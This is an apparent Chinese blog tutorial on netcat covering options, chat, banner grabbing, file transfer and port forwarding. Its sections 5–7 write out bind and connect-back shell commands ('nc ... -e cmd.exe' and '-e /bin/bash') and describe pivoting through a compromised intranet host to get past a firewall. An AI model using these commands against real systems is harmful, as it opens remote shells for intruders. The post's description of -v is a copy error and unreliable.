Netcat基础使用

netcat命令选项

本文参考文章链接

本文参考文章链接1

本文参考文章链接2

本文参考文章链接3

常用命令选项

## 网络模式和代理相关
-l 监听,作服务器。不填时作客户端。
-u UDP模式。不填时默认TCP模式。
-X 和 -x 是代理相关的选项

## 其余常用选项
-v verbose模式,打印更多日志
-z 连接以后就断开,用于测试网络连接是否连通 //探测端口的连通性
-w 超时时间,单位是秒
-s 指定source addr
-p 指定source port
-n 只识别IP地址,不查询DNS
-k 处理完一个请求之后,继续监听下一个
-d 脱离命令行窗口,在后台运行,常用于后门建立的过程
-e 执行某个程序,常用于后门建立的过程
-L 设置netcat处于监听状态等待链接,当客户端断开,服务器依旧回到等待状态

基本全部命令选项

用法:

ncat [选项] [主机名] [端口]

 

花费时间的选项以秒为单位。 附加“ ms”毫秒,“ s”表示秒,“ m”表示分钟,或“ h”表示小时(例如500ms)。

 

-4    仅使用IPv4

-6    仅使用IPv6

 

-U, --unixsock 仅使用Unix域套接字

	--vsock 仅使用vsock套接字

 

-C, --crlf 将CRLF用于EOL序列

-c, --sh-exec <command> 通过/bin/sh执行给定命令

-e, --exec <command> 执行给定命令

	--lua-exec <filename> 执行给定的Lua脚本

 

-g hop1[,hop2,...] 松散的源路由跳跃点(最大8个)

-G <n> 松散的源路由跳跃指针(4、8、12,...)

-m, --max-conns <n> 最大<n>同时连接

-h, --help 显示此帮助屏幕

-d, --delay <time> 在读/写之间等待时间

-o, --output <filename> 将会话数据转储到文件中

-x, --hex-dump <filename> 将会话数据以十六进制形式转储到文件中

-i, --idle-timeout <time> 空闲读/写超时时间

-p, --source-port port 指定要使用的源端口

-s, --source addr 指定要使用的源地址(不影响-l)

-l, --listen 绑定并监听传入的连接

-k, --keep-open 在侦听模式下接受多个连接

-n, --nodns 不通过DNS解析主机名

-t, --telnet 回答Telnet协商

-u, --udp 使用UDP代替默认TCP

	--sctp 使用SCTP代替默认TCP

 

-v, --verbose 使用SCTP代替默认TCP

-w, --wait <time> 连接超时时间

 

-z   零I/O模式,仅报告连接状态

1. 模拟聊天

  • 服务器
nc -l -p [端口号]
  • 客户端
nc [服务器ip] [服务器端口]

2.Banner抓取方法

  • Banner是一个文本,Banner是一个你连接的服务器发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner。一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。
echo "" | nc -v -n w1 [target_ip] [开始端口-结束端口]

3.文件传输

从客户端传输文件到服务器

  • 服务器
nc -l -p [端口号] > out_filename
  • 客户端
nc [目标IP] [目标端口] < in_flimename

从服务器传输文件到客户端

  • 服务器
nc -l -p [端口号] < in_filename
  • 客户端
nc [目标IP] [目标端口] > out_flimename

4.目录传输(与文件传输类似)

  • 服务器
tar -cvf - dir_name | nc -l [port_id]
  • 客户端
nc -n [target_ip] [target_port] | tar -xvf -

5. windows建立后门的方法

服务器——监听型后门

nc -l -p [port_id] -e cmd.exe

客户端——连接型后门

nc [target_ip] [target_port] -e cmd.exe

6、Linux下建立后门

服务器——监听型后门

nc -l -p [port_id] -e /bin/bash

客户端——连接型后门

nc [target_ip] [target_port] -e /bin/bash

7、连接转发

  • 可以解决的问题
  1. 对于无法访问内网特定机器的问题,我们可以先抓取内网一台机器,然后利用这台弱鸡进行端口转发,接受外网的数据,将数据转发到内网目标机器的特定端口。
'''假设机器A和机器B是内网机器,机器B是我们的目标机器,机器C是外网机器,机器C和机器A是出于同一网段的,可以互相访问,机器C不可以访问机器B'''# bat文件中的内容: nc [ip_B] [port_B]A: nc -l -p [port_A] -e XX.batB: nc -l -p [port_B] C: nc [ip_A] [prt_A]
  1. 对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口做端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火墙。
## 原理同上

8、反弹shell

BFDrmd.md.png

posted @ 2021-06-18 20:33  mxrmiss  阅读(146)  评论(0编辑  收藏  举报